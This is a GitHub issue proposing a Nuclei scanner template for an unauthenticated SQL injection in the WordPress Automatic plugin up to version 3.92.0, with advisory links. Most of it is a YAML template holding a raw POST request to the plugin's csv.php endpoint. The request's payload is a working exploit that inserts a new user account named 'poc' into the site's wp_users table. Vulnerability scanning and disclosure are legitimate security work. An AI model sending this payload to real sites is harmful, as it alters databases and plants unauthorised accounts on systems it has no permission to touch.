### ISSUE TITLE
SQL Command ('SQL Injection') in ValvePress Automatic

### ISSUE THREAD

**Issue by aheybati** [projectdiscovery/nuclei-templates#9662]
### Template Information:

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0. 

### References:

https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin?_s_id=cve
https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
https://twitter.com/MrTuxracer/status/1784229071460692232

### Template-file:

```yaml
id:  WordPress-Automatic
info:
  name:  "WordPress Automatic Plugin <= 3.92.0 is vulnerable to SQL Injection"
  author: abbas.heybati
  severity: Critical
  description: "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0. "
  reference:
    - https://twitter.com/MrTuxracer/status/1784229071460692232
    - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
    - https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin?_s_id=cve
  tags: WordPress
http:
  - raw:
      - |-
        POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 217

        q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
    matchers:
      - type: word
        part: body
        words:
          - 'DATE,ACTION,DATA,KEYWORD'

```
